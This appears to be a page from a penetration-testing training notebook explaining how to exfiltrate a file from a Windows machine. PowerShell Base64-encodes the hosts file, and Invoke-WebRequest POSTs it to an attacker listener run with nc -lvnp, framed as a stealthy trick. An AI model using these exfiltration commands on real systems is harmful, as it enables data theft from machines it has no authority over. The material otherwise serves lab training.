search

🧬 PowerShell Base64 Web Upload

Here's a slick way to exfiltrate files using PowerShell, Base64, and a simple Netcat listener on your attack box β€” no need for a fancy web server! πŸ§ͺπŸ’‘

hashtag
🧱 Step 1: Encode the File in PowerShell

We’ll convert the file into Base64 so it can be transferred as plain text.

PS C:\htb> $b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))

hashtag
πŸš€ Step 2: Send It as a POST Request

Now we send that Base64 string to our attacker box using Invoke-WebRequest.

PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

hashtag
πŸ›‘οΈ Step 3: Catch the Data with Netcat

Set up Netcat on your attack box to listen for incoming POST data:

z3tssu@htb[/htb]$ nc -lvnp 8000

🧲 You’ll see something like this when the request comes through:

POST / HTTP/1.1
User-Agent: Mozilla/5.0...
Content-Length: 1820

<your base64 string here!>

hashtag
πŸ”“ Step 4: Decode and Rebuild the File

Copy the Base64 string and decode it back into the original file:

βœ”οΈ Now your hosts file is restored! Want to verify it? Just run md5sum to compare hashes. πŸ”

hashtag
πŸ’‘ Tip:

This trick is super handy for environments where you don’t have an upload endpoint but can exfil data in a stealthy way via HTTP POST.

Previous🌐 PowerShell Web UploadsNext🌐 SMB Uploads with WebDAV Twist

Last updated